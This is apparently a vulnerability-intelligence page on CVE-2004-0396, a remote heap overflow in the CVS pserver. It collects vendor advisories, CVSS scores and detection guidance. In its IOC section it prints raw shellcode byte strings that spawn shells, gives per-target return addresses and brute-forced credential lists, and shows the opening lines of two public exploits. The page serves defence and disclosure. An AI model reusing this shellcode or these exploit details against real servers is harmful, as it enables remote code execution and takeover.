CVE-2004-0396
published 2004-06-14CVE-2004-0396: Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary…
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.53%
99.2th percentile
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cvs | cvs | — | — |
| cvs | cvs | — | — |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| debian | cvs | < cvs 1:1.12.5-6 (bookworm) | cvs 1:1.12.5-6 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x15\x42\x4c\x34\x43\x4b\x48\x34\x37\x20\x34\x20\x4c\x31\x46\x33\x20\x42\x52\x4f\x21\x0a\x31\xc0\x50\x68\x78\x79\x6f\x75\x68\x61\x62\x72\x6f\x89\xe1\x6a\x08\x5a\x31\xdb\x43\x6a\x04\x58\xcd\x80\x6a\x17\x58\x31\xdb\xcd\x80\x31\xd2\x52\x68\x2e\x2e\x72\x67\x58\x05\x01\x01\x01\x01\x50\xeb\x12\x4c\x45\x20\x54\x52\x55\x43\x20\x43\x48\x45\x4c\x4f\x55\x20\x49\x43\x49\x68\x2e\x62\x69\x6e\x58\x40\x50\x89\xe3\x52\x54\x54\x59\x6a\x0b\x58\xcd\x80\x31\xc0\x40\xcd\x80
bytes↗
\x6a\x1b\x58\x31\xdb\xcd\x80\x85\xc0\x74\x42\x6a\x19\x58\x50\xcd\x80\x50\x6a\x17\x58\x50\xcd\x80\x68\x2d\x41\x42\x2d\x89\xe3\x6a\x04\x58\x50\x53\x6a\x01\x50\xcd\x80\x6a\x02\x6a\x01\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\x6a\x31\x58\xcd\x80\x93\x6a\x17\x58\xcd\x80\x6a\x04\x58\x6a\x01\x5b\x68\x2d\x41\x42\x2d\x89\xe1\x89\xc2\xcd\x80\xb0\x3f\x6a\x01\x5b\x6a\x02\x59\xcd\x80\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00
bytes↗
\x21\x18\xd8\x58\xa0\x14\x23\x61\x90\x10\x20\x01\x92\x0b\x80\x0e\x94\x10\x20\x04\x82\x10\x20\x04\x91\xd0\x20\x08\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh
- →Monitor TCP port 2401 (CVS pserver) for malformed 'Entry' lines sent during authentication — the overflow is triggered via Entry lines in the pserver protocol. ↗
- →Detect exploit traffic by looking for the magic marker string 'abroxyou' in CVS pserver (TCP/2401) traffic, used by the exploit to confirm shellcode execution. ↗
- →Detect exploit traffic by looking for the marker string '-AB-' written to stdout by the xx_shellcode payload, indicating successful exploitation. ↗
- →Detect heap-spray/normalization phase: large numbers of 'Entry' lines with repeated 0x41/0x42/0x43 fill bytes sent over CVS pserver prior to the overflow. ↗
- →Exploit uses 'Gzip-stream 1' compression negotiation immediately before triggering the overflow; detect anomalous Gzip-stream requests on CVS pserver sessions that also contain oversized Entry lines. ↗
- →Exploit brute-forces common anonymous CVS credentials (user: anonymous/anoncvs/cvs/guest; pass: empty/anonymous/anoncvs) and common cvsroot paths; alert on rapid sequential AUTH REQUEST attempts with these credentials. ↗
- ·Affected versions are CVS 1.11.x through 1.11.15 and 1.12.x through 1.12.7 only; the vulnerability requires the pserver mechanism to be enabled. ↗
- ·The Linux exploit (exploit-db 300) attempts OS fingerprinting before choosing between Linux and BSD exploitation paths; detection rules should cover both code paths. ↗
- ·The Solaris/SPARC exploit (exploit-db 301) targets specific CVS binary offsets per version; retaddr values differ per target (e.g., 0xd4cc8 for cvs-1.11.1p1 Solaris9/SPARC, 0xd7ae8+8192 for cvs-1.12.2 Solaris9/SPARC). ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2004-05-19·CVSS 7.5
CVE-2004-0396 [HIGH] security flaw
security flaw
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
BSD
FreeBSD-SA-04:10.cvs: CVS pserver protocol parser errors
bsd_advisories·2004-05-19
FreeBSD-SA-04:10.cvs: CVS pserver protocol parser errors
FreeBSD-SA-04:10.cvs Security Advisory
The FreeBSD Project
Topic: CVS pserver protocol parser errors
Category: contrib
Module: contrib_cvs
Announced: 2004-05-19
Revised: 2004-05-20
Credits: Stefan Esser
Affects: All FreeBSD versions
Corrected: 2004-05-20 13:17:16 UTC (RELENG_4, 4.10-PRERELEASE)
2004-05-20 13:17:42 UTC (RELENG_4_10, 4.10-RC)
2004-05-20 13:18:08 UTC (RELENG_4_9, 4.9-RELEASE-p8)
2004-05-20 13:18:07 UTC (RELENG_4_8, 4.8-RELEASE-p21)
2004-05-20 13:18:06 UTC (RELENG_4_7, 4.7-RELEASE-p27)
2004-05-20 13:18:10 UTC (RELENG_5_2, 5.2.1-RELEASE-p7)
2004-05-20 13:18:09 UTC (RELENG_5_1, 5.1-RELEASE-p17)
2004-05-20 13:18:09 UTC (RELENG_5_0, 5.0-RELEASE-p21)
CVE Name: CAN-2004-0396
FreeBSD only: NO
For general information regarding FreeBSD Security Advisories,
including descriptions of
Debian
CVE-2004-0396: cvs - Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7,...
vendor_debian·2004·CVSS 7.5
CVE-2004-0396 [HIGH] CVE-2004-0396: cvs - Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7,...
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
Scope: local
bookworm: resolved (fixed in 1:1.12.5-6)
bullseye: resolved (fixed in 1:1.12.5-6)
forky: resolved (fixed in 1:1.12.5-6)
sid: resolved (fixed in 1:1.12.5-6)
trixie: resolved (fixed in 1:1.12.5-6)
GHSA
GHSA-qvjj-23hg-238h: Heap-based buffer overflow in CVS 1
ghsa_unreviewed·2022-05-03
CVE-2004-0396 [HIGH] GHSA-qvjj-23hg-238h: Heap-based buffer overflow in CVS 1
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
OSV
CVE-2004-0396: Heap-based buffer overflow in CVS 1
osv·2004-06-14·CVSS 7.5
CVE-2004-0396 [HIGH] CVE-2004-0396: Heap-based buffer overflow in CVS 1
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
No detection rules found.
Exploit-DB
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow
exploitdb·2004-06-25
CVE-2004-0396 CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef unsigned char uchar;
void progress(void);
int brute_cvsroot(void);
int brute_username(void);
int brute_password(void);
void hdl_crashed(int);
void bsd_exploitation(void);
void try_exploit(void);
void zflush(int);
int zprintf(char *, ...);
int zgetch(void);
void start_gzip(void);
void fill_holes(void);
char * zgets(void);
void evil_entry(void);
void linux_exploitation(ulong, int);
void do_dicotomie(void);
void do_xploit(void);
char * flush_sock(void);
void usage(char *);
long getip(char *);
void try_oneshoot(void);
int connect_to_host(char *, int);
int write_sock(void *, int);
int read_sock(void *,
Exploit-DB
CVS - Remote Entry Line Root Heap Overflow
exploitdb·2004-06-25
CVE-2004-0396 CVS - Remote Entry Line Root Heap Overflow
CVS - Remote Entry Line Root Heap Overflow
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define CVS_PORT 2401
#define RET 0xffbffd20
#define NOP 0x82102017
#define ROUND(s) if (s % word_size) s += (word_size - (s % word_size))
unsigned char *root;
unsigned char *user;
unsigned char *pass;
unsigned char *scrambled;
unsigned char *reposit;
unsigned char *directory;
unsigned char buf[512];
unsigned char *host;
unsigned int rport, port;
unsigned int target;
z_stream zout;
z_stream zin;
unsigned char zbuf[65536 * 4];
unsigned int zbufpos, zsent = 0;
unsigned int word_size = 8, fill_size;
unsigned int len1, len2, len3;
unsigned int oflip, change, retaddr;
char entry1[64], entry2[64], entry3[64];
struct exp
ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-008.txt.ascftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:10.cvs.aschttp://archives.neohapsis.com/archives/fulldisclosure/2004-05/0980.htmlhttp://cert.uni-stuttgart.de/archive/bugtraq/2004/05/msg00219.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021742.htmlhttp://marc.info/?l=bugtraq&m=108498454829020&w=2http://marc.info/?l=bugtraq&m=108500040719512&w=2http://marc.info/?l=bugtraq&m=108636445031613&w=2http://marc.info/?l=openbsd-security-announce&m=108508894405639&w=2http://secunia.com/advisories/11641http://secunia.com/advisories/11647http://secunia.com/advisories/11651http://secunia.com/advisories/11652http://secunia.com/advisories/11674http://security.e-matters.de/advisories/072004.htmlhttp://security.gentoo.org/glsa/glsa-200405-12.xmlhttp://www.ciac.org/ciac/bulletins/o-147.shtmlhttp://www.debian.org/security/2004/dsa-505http://www.kb.cert.org/vuls/id/192038http://www.mandriva.com/security/advisories?name=MDKSA-2004:048http://www.osvdb.org/6305http://www.redhat.com/support/errata/RHSA-2004-190.htmlhttp://www.securityfocus.com/bid/10384http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.395865http://www.us-cert.gov/cas/techalerts/TA04-147A.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/16193https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9058https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A970ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-008.txt.ascftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:10.cvs.aschttp://archives.neohapsis.com/archives/fulldisclosure/2004-05/0980.htmlhttp://cert.uni-stuttgart.de/archive/bugtraq/2004/05/msg00219.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021742.htmlhttp://marc.info/?l=bugtraq&m=108498454829020&w=2http://marc.info/?l=bugtraq&m=108500040719512&w=2http://marc.info/?l=bugtraq&m=108636445031613&w=2http://marc.info/?l=openbsd-security-announce&m=108508894405639&w=2http://secunia.com/advisories/11641http://secunia.com/advisories/11647http://secunia.com/advisories/11651http://secunia.com/advisories/11652http://secunia.com/advisories/11674http://security.e-matters.de/advisories/072004.htmlhttp://security.gentoo.org/glsa/glsa-200405-12.xmlhttp://www.ciac.org/ciac/bulletins/o-147.shtmlhttp://www.debian.org/security/2004/dsa-505http://www.kb.cert.org/vuls/id/192038http://www.mandriva.com/security/advisories?name=MDKSA-2004:048http://www.osvdb.org/6305http://www.redhat.com/support/errata/RHSA-2004-190.htmlhttp://www.securityfocus.com/bid/10384http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.395865http://www.us-cert.gov/cas/techalerts/TA04-147A.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/16193https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9058https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A970
2004-06-14
Published